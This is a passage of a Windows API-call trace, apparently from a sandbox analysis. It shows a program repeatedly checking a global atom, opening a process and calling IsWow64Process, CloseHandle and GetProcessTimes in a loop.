	[0120.820] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.820] CloseHandle (hObject=0x698) returned 1
	[0120.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.820] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.821] CloseHandle (hObject=0x698) returned 1
	[0120.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.821] CloseHandle (hObject=0x698) returned 1
	[0120.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.821] CloseHandle (hObject=0x698) returned 1
	[0120.821] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.821] CloseHandle (hObject=0x698) returned 1
	[0120.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.867] CloseHandle (hObject=0x698) returned 1
	[0120.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.867] CloseHandle (hObject=0x698) returned 1
	[0120.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.867] CloseHandle (hObject=0x698) returned 1
	[0120.867] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.868] CloseHandle (hObject=0x698) returned 1
	[0120.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.868] CloseHandle (hObject=0x698) returned 1
	[0120.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.868] CloseHandle (hObject=0x698) returned 1
	[0120.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.868] CloseHandle (hObject=0x698) returned 1
	[0120.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.868] CloseHandle (hObject=0x698) returned 1
	[0120.868] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.869] CloseHandle (hObject=0x698) returned 1
	[0120.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.869] CloseHandle (hObject=0x698) returned 1
	[0120.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.869] CloseHandle (hObject=0x698) returned 1
	[0120.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.869] CloseHandle (hObject=0x698) returned 1
	[0120.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.869] CloseHandle (hObject=0x698) returned 1
	[0120.869] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.870] CloseHandle (hObject=0x698) returned 1
	[0120.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.870] CloseHandle (hObject=0x698) returned 1
	[0120.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.870] CloseHandle (hObject=0x698) returned 1
	[0120.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.870] CloseHandle (hObject=0x698) returned 1
	[0120.870] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.870] CloseHandle (hObject=0x698) returned 1
	[0120.897] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.897] CloseHandle (hObject=0x698) returned 1
	[0120.897] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.897] CloseHandle (hObject=0x698) returned 1
	[0120.897] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.898] CloseHandle (hObject=0x698) returned 1
	[0120.898] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.898] CloseHandle (hObject=0x698) returned 1
	[0120.898] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.898] CloseHandle (hObject=0x698) returned 1
	[0120.898] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.898] CloseHandle (hObject=0x698) returned 1
	[0120.898] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.898] CloseHandle (hObject=0x698) returned 1
	[0120.898] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.899] CloseHandle (hObject=0x698) returned 1
	[0120.899] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.899] CloseHandle (hObject=0x698) returned 1
	[0120.899] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.899] CloseHandle (hObject=0x698) returned 1
	[0120.899] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.899] CloseHandle (hObject=0x698) returned 1
	[0120.899] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.899] CloseHandle (hObject=0x698) returned 1
	[0120.899] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.900] CloseHandle (hObject=0x698) returned 1
	[0120.900] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.900] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0120.900] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0120.901] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.901] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0120.901] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0120.901] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0120.901] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0120.901] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0120.901] CloseHandle (hObject=0x698) returned 1
	[0120.901] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0120.901] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.902] CloseHandle (hObject=0x698) returned 1
	[0120.902] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.902] CloseHandle (hObject=0x698) returned 1
	[0120.902] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.902] CloseHandle (hObject=0x698) returned 1
	[0120.904] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0120.904] CloseHandle (hObject=0x698) returned 1
	[0121.150] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.150] CloseHandle (hObject=0x698) returned 1
	[0121.150] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.151] CloseHandle (hObject=0x698) returned 1
	[0121.151] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.151] CloseHandle (hObject=0x698) returned 1
	[0121.151] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.151] CloseHandle (hObject=0x698) returned 1
	[0121.151] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.151] CloseHandle (hObject=0x698) returned 1
	[0121.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.152] CloseHandle (hObject=0x698) returned 1
	[0121.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.152] CloseHandle (hObject=0x698) returned 1
	[0121.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.152] CloseHandle (hObject=0x698) returned 1
	[0121.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.152] CloseHandle (hObject=0x698) returned 1
	[0121.152] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.152] CloseHandle (hObject=0x698) returned 1
	[0121.153] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.157] CloseHandle (hObject=0x698) returned 1
	[0121.157] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.157] CloseHandle (hObject=0x698) returned 1
	[0121.157] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.158] CloseHandle (hObject=0x698) returned 1
	[0121.158] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.158] CloseHandle (hObject=0x698) returned 1
	[0121.158] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.158] CloseHandle (hObject=0x698) returned 1
	[0121.158] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.158] CloseHandle (hObject=0x698) returned 1
	[0121.158] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.158] CloseHandle (hObject=0x698) returned 1
	[0121.159] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.159] CloseHandle (hObject=0x698) returned 1
	[0121.159] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.159] CloseHandle (hObject=0x698) returned 1
	[0121.159] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.159] CloseHandle (hObject=0x698) returned 1
	[0121.159] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.159] CloseHandle (hObject=0x698) returned 1
	[0121.159] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.159] CloseHandle (hObject=0x698) returned 1
	[0121.160] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.160] CloseHandle (hObject=0x698) returned 1
	[0121.160] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.160] CloseHandle (hObject=0x698) returned 1
	[0121.160] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.160] CloseHandle (hObject=0x698) returned 1
	[0121.160] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.160] CloseHandle (hObject=0x698) returned 1
	[0121.160] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.160] CloseHandle (hObject=0x698) returned 1
	[0121.161] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.162] CloseHandle (hObject=0x698) returned 1
	[0121.162] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.162] CloseHandle (hObject=0x698) returned 1
	[0121.162] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.162] CloseHandle (hObject=0x698) returned 1
	[0121.162] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.162] CloseHandle (hObject=0x698) returned 1
	[0121.163] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.163] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.163] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.163] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.164] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.164] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.164] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.164] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.164] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.164] CloseHandle (hObject=0x698) returned 1
	[0121.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.164] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.164] CloseHandle (hObject=0x698) returned 1
	[0121.165] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.165] CloseHandle (hObject=0x698) returned 1
	[0121.165] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.165] CloseHandle (hObject=0x698) returned 1
	[0121.165] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.165] CloseHandle (hObject=0x698) returned 1
	[0121.242] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.242] CloseHandle (hObject=0x698) returned 1
	[0121.242] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.242] CloseHandle (hObject=0x698) returned 1
	[0121.242] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.242] CloseHandle (hObject=0x698) returned 1
	[0121.242] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.243] CloseHandle (hObject=0x698) returned 1
	[0121.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.243] CloseHandle (hObject=0x698) returned 1
	[0121.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.243] CloseHandle (hObject=0x698) returned 1
	[0121.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.243] CloseHandle (hObject=0x698) returned 1
	[0121.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.243] CloseHandle (hObject=0x698) returned 1
	[0121.243] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.244] CloseHandle (hObject=0x698) returned 1
	[0121.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.244] CloseHandle (hObject=0x698) returned 1
	[0121.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.244] CloseHandle (hObject=0x698) returned 1
	[0121.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.244] CloseHandle (hObject=0x698) returned 1
	[0121.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.244] CloseHandle (hObject=0x698) returned 1
	[0121.244] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.244] CloseHandle (hObject=0x698) returned 1
	[0121.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.245] CloseHandle (hObject=0x698) returned 1
	[0121.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.245] CloseHandle (hObject=0x698) returned 1
	[0121.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.245] CloseHandle (hObject=0x698) returned 1
	[0121.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.245] CloseHandle (hObject=0x698) returned 1
	[0121.245] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.246] CloseHandle (hObject=0x698) returned 1
	[0121.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.246] CloseHandle (hObject=0x698) returned 1
	[0121.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.246] CloseHandle (hObject=0x698) returned 1
	[0121.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.246] CloseHandle (hObject=0x698) returned 1
	[0121.246] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.246] CloseHandle (hObject=0x698) returned 1
	[0121.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.247] CloseHandle (hObject=0x698) returned 1
	[0121.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.247] CloseHandle (hObject=0x698) returned 1
	[0121.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.247] CloseHandle (hObject=0x698) returned 1
	[0121.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.247] CloseHandle (hObject=0x698) returned 1
	[0121.247] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.247] CloseHandle (hObject=0x698) returned 1
	[0121.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.248] CloseHandle (hObject=0x698) returned 1
	[0121.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.248] CloseHandle (hObject=0x698) returned 1
	[0121.248] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.248] CloseHandle (hObject=0x698) returned 1
	[0121.248] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.249] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.249] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.249] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.254] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.254] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.254] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.254] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.254] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.255] CloseHandle (hObject=0x698) returned 1
	[0121.255] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0121.255] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.255] CloseHandle (hObject=0x698) returned 1
	[0121.255] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.255] CloseHandle (hObject=0x698) returned 1
	[0121.255] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.255] CloseHandle (hObject=0x698) returned 1
	[0121.255] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.255] CloseHandle (hObject=0x698) returned 1
	[0121.289] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.289] CloseHandle (hObject=0x698) returned 1
	[0121.290] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.290] CloseHandle (hObject=0x698) returned 1
	[0121.290] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.290] CloseHandle (hObject=0x698) returned 1
	[0121.290] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.290] CloseHandle (hObject=0x698) returned 1
	[0121.290] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.290] CloseHandle (hObject=0x698) returned 1
	[0121.290] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.291] CloseHandle (hObject=0x698) returned 1
	[0121.291] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.291] CloseHandle (hObject=0x698) returned 1
	[0121.291] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.291] CloseHandle (hObject=0x698) returned 1
	[0121.291] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.291] CloseHandle (hObject=0x698) returned 1
	[0121.291] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.291] CloseHandle (hObject=0x698) returned 1
	[0121.292] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.292] CloseHandle (hObject=0x698) returned 1
	[0121.292] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.292] CloseHandle (hObject=0x698) returned 1
	[0121.292] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.292] CloseHandle (hObject=0x698) returned 1
	[0121.292] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.292] CloseHandle (hObject=0x698) returned 1
	[0121.293] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.293] CloseHandle (hObject=0x698) returned 1
	[0121.293] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.293] CloseHandle (hObject=0x698) returned 1
	[0121.293] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.293] CloseHandle (hObject=0x698) returned 1
	[0121.293] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.293] CloseHandle (hObject=0x698) returned 1
	[0121.293] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.293] CloseHandle (hObject=0x698) returned 1
	[0121.294] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.294] CloseHandle (hObject=0x698) returned 1
	[0121.294] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.294] CloseHandle (hObject=0x698) returned 1
	[0121.294] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.294] CloseHandle (hObject=0x698) returned 1
	[0121.294] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.294] CloseHandle (hObject=0x698) returned 1
	[0121.294] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.295] CloseHandle (hObject=0x698) returned 1
	[0121.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.295] CloseHandle (hObject=0x698) returned 1
	[0121.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.295] CloseHandle (hObject=0x698) returned 1
	[0121.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.295] CloseHandle (hObject=0x698) returned 1
	[0121.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.295] CloseHandle (hObject=0x698) returned 1
	[0121.295] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.295] CloseHandle (hObject=0x698) returned 1
	[0121.296] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.296] CloseHandle (hObject=0x698) returned 1
	[0121.296] IsWow64Process (in: hProcess=0x698, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0121.296] CloseHandle (hObject=0x698) returned 1
	[0121.296] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.297] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0121.297] GetProcessTimes (in: hProcess=0x698, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0121.299] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.299] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0121.300] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0121.300] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0121.300] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0121.300] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0121.300] CloseHandle (hObject=0x698) returned 1
